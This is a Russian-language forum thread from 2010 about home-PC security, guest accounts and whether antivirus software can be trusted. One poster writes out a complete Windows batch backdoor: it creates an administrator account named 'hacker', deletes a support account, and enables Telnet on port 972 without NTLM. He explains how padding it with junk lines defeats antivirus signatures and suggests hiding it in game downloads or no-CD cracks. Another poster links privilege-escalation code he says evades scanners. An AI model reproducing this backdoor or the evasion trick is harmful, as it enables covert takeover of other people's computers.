Форум Oni

Если человек на компе только лазит в инете, смотрит кино, слушает музыку, читает тексты и т.д. - гость для него лучшая защита. А таких большинство.

Мih@ написал(а):

выпиливающим суперпользовательскую учётку

Его цель - открыть доступ к чужому компу!
Если батник сделать так

chcp 1251
s
net user SUPPORT_388945a0 /delete
s
net user hacker hack /add
s
net localgroup Администраторы hacker /add
s
net localgroup Пользователи SUPPORT_388945a0 /del
s
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

то антивирусы угрозы в нём не видят!!! А троян при этом такой же работоспособный и опасный! Антивирусную базу очень легко обмануть. Может проактивная зашита троян остановит, но я сомневаюсь. Представьте , что троян весит не 200 байт, а 200 килобайт и замаскирован под что нибудь безобидное. А уж спрятать его в 4 гигабайтную игру очень легко. Или в 3 мегабайтный no cd.
Вы после этого всё равно уверены, что на трекере безопасно? Там кстати скорость низкая, качать долго. А в локалке быстро.

Классифицирует, если троян без "s".

Мih@ написал(а):

ЧЯДНТ?

У вас троян с "s". Надо без "s", как в "Backdoor1.txt". Кстати, Касперкий написал что "неисполняемый формат txt опасен"! Он так не написал открыто, но вы видите строчку "Проверенный файл - Backdoor1.txt - инфицирован".

Отредактировал(а) Manticore (15-06-2010 15:49:46)

---

Прикрепленные файлы:
Backdoor1.zip, Размер: 173,678 байт, Скачано: 605

AJIuCaRD написал(а):

АВГ есдинственный большинство вирусов находит

А ты уверен, что это не ложные обнаружения? И когда он пишет "заражен", почему/на каком основании ты веришь антивирусу? Может он просто так это написал?
В том батнике вставь "s" и посмотри, облажается AVG или нет?

Sockol@ написал(а):

NOD32

"s" NOD32 тоже обманул!

Sockol@ написал(а):

КАК????ДОКАЖИ!!!!!!!!!!!!!!

Как-как. По сигнатуре не совпадает, поэтому NOD32 пишет "не заражен".
У тебя есть NOD32? Создай троян с "s" и посмотри реакцию NOD32. На virustotal троян закинь. Там 30 антивирусов, никто угрозы не увидит. Может потому что троян без жала? С жалом я тоже пробовал, не видят угрозы.
Ща за пивком сбегаю, потом докажу.

Manticore, доступ открыть и из-под гостя можно. И не только батником. И не только через службу телнета. Вот эта фигня, например, работает под гостем (даёт, сколько есть доступа у гостя ? достаточно, чтобы получить больше) и на протяжении лет пяти почти сканерами не детектилась (сейчас 6/40 и проактивкой везде почти): http://boooooo.pastebin.com/nWQczWnF (компилировать не буду, а в коде баг во избежание ;-)) Я иногда пользуюсь Анубисом против такого (но это не антивирус). Ну и файрвол спасает, хоть и обходится тоже.

Грамотно расставленные разрешения тебя от многого спасут, но ты убьёшься их расставлять. И не факт, что однажды ты сам не запустишь какую-нибудь гадость под админом. Гораздо проще сразу думать, откуда и что ты качаешь. И не ползать по левым варезятникам и порносайтам, да.

Блин. Программы запускать можно? В интернет можно? Этого достаточно.
Но вообще, этому уже много лет, и я могу ошибаться вполне) Скопипастил из архива)

Отредактировал(а) Sfeli (15-06-2010 20:04:08)

Если я отключил все службы, позволяющие удаленно смотреть мой комп и запретил их запуск, то как меня прошпионят?